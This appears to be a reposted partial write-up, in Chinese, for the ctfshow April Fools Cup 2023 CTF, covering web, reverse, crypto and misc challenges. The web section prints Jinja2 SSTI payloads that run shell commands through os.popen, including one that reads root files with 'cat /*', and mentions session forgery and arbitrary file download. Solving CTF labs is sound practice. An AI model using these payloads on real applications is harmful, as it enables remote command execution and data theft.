CTFSHOW愚人杯2023 部分wp

这篇具有很好参考价值的文章主要介绍了CTFSHOW愚人杯2023 部分wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

web

easy_signin

url是base64编码后的文件名
直接读个index.php
然后查看源码 解码base64

easy_ssti

过滤了斜杠,不能访问根目录了,考虑手动拼接一个{{lipsum.__globals__.os.popen(lipsum.__globals__.__str__().__getitem__(34)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(22)~lipsum.__globals__.__str__().__getitem__(139)~lipsum.__globals__.__str__().__getitem__(288)~lipsum.__globals__.__str__().__getitem__(87)~lipsum.__globals__.__str__().__getitem__(24)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(54)).read()}}

easy_flask

session伪造
伪造成admin登录后可以任意文件下载
下个app.py看源码
CTFSHOW愚人杯2023 部分wp
hello路由下存在ssti
可以tplmap一把梭
手动挡payload如下
request.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /*").read()')

re

easy_pyc

反编译得到py源码

uncompyle6 -o a.py  xxx.pyc

CTFSHOW愚人杯2023 部分wp

crypto

easy_base

签到 解码base64即可

misc

奇怪的压缩包

09改00然后bandzip修复
CTFSHOW愚人杯2023 部分wp
crc爆破宽高
CTFSHOW愚人杯2023 部分wp
修改高度为300
Ocr识别得到
5oSa5Lq66lqC5b+r5LmQ77yB77yB77yB解base64可以得到类似愚人节快乐的字符串
没什么用
Binwalk抽下图
发现里面还有一个压缩包
010打开

CTFSHOW愚人杯2023 部分wp
在最后发现key的base64编码后的值,解码得到yurenjie
解压得到图片
crc 完了ocr
CTFSHOW愚人杯2023 部分wp

琴柳感

CTFSHOW愚人杯2023 部分wp
观察发现除去开头和结尾独立的两句话 一共来回四句话
猜测四进制
四位一组要想能解出字母第一位必是1 因为4^3 =64
那么所有的你有没有感受到城市在分崩离析?替换为1,另外三局遍历替换
最终得到的四进制的字符串

120313101212130312201233131313231320122112321213120213111203121112321213132012211232121311331321122112021311132212011221132112211133132212011221122312111230122112011232132112211230122112011232120212011331

CTFSHOW愚人杯2023 部分wp文章来源地址https://www.toymoban.com/news/detail-436470.html

到了这里,关于CTFSHOW愚人杯2023 部分wp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • URL编码和Base64编码

    数据操作过程中,经常涉及到编码与解码等相关操作,如web请求时会对 url进行编码 ,其中的中文等字符会转义为其他内容;中文字符串数据传输时,会将其使用 base64编码 并在接收后解码,以避免乱码的出现。 URLDecoder 和 URLEncoder 用于普通字符串 和 application/x-www-form-urlenco

    2024年02月02日
    浏览(57)
  • python标准模块介绍 -Base64: Base64, Base85等数据编码

    功能:RFC 3548: Base16, Base32, Base64 数据编码。转换二进制数据为适合明文协议传输的 ASCII 序列。转换 8bits 为每个字节包含 6,5 或 4bits 的有效数据,比如 SMTP, URL 的一部分或者 HTTP POST 的一部分。参考: RFC 3548。编码算法不同于 uuencode。 类型:标准库 相关模块:uu, binhex, uu, quopri Base64

    2024年02月05日
    浏览(43)
  • ctfshow愚人杯web复现

    题目url base64解码是 face.png ,尝试 flag.txt 和 flag.php ,base64加密后传入都不对,用 index.php 加密后传入,看源码 将后面的base64解密得到flag 源码 先看怎么传参 这一句话的意思是接收header头中 aaaaaa参数的值,就例如这样的 然后提示说有一个txt,但不知道名字是什么,想办法读取

    2023年04月09日
    浏览(34)
  • MIME Base64编码

    Base64是一种用于将二进制数据编码成可打印ASCII字符的编码方式。它由64个字符组成,包括A-Z、a-z、0-9以及+和/。它的编码规则非常简单:将3个字节的二进制数据(共24位)分成4组,每组6位,然后将这4组6位的值转换成一个可打印ASCII字符。 MIME Base64是Base64的一种变体,它是

    2023年04月25日
    浏览(44)
  • Base64编码的全面介绍

    1. Base64的定义和作用 Base64是一种用64个字符表示二进制数据的编码方式,通常用于在网络传输中将二进制数据转换为可打印字符的形式。Base64编码后的数据由大小写字母、数字和特殊字符组成,可以安全地在文本协议中传输,同时保留数据的完整性。 Base64编码解码 | 一个覆盖

    2024年04月08日
    浏览(38)
  • js的Base64编码

    一、内置函数 内置函数:btoa 内置函数:atob 二、借助第三方库实现,例如CryptoJS //自己编写一套Base64编码和解码算法

    2024年02月10日
    浏览(49)
  • 前端实现base64编码处理

    文件上传时,因为base64文件字符串过长后端接收失败的问题。 提示:以下是本篇文章正文内容,下面案例可供参考 Base64是一种用于将二进制数据转换为ASCII字符集中可打印字符的编码方法。它通常用于在不同系统之间传输二进制数据,因为许多系统只支持文本数据的传输。 代

    2024年02月12日
    浏览(33)
  • 深入了解图片Base64编码

    title: 深入了解图片Base64编码 date: 2024/4/8 10:03:22 updated: 2024/4/8 10:03:22 tags: Base64编码 图片转换 HTTP请求 前端开发 移动应用 性能优化 图片压缩 Base64编码是一种将二进制数据转换为文本字符串的编码方式,通过将数据转换为一种可打印的ASCII字符集,以便在文本协议中传输。对图

    2024年04月08日
    浏览(49)
  • python基础-base64编码理解

    目录 1、base64是什么 2、base64有什么用 3、base64如何用 4、理解base64 5、扩展 1、base64是什么 base64 就是包括字母a-z,A-Z,数字0-9,符号“+”,“/”一共64个字符的字符集; 还有一个‘=’ 字符,占位补充;         -- 这样看实际是65个字符了,‘=’只是占位  任何数据都可以转

    2024年01月20日
    浏览(42)
  • 将文件base64编码后传输

    2024年02月07日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包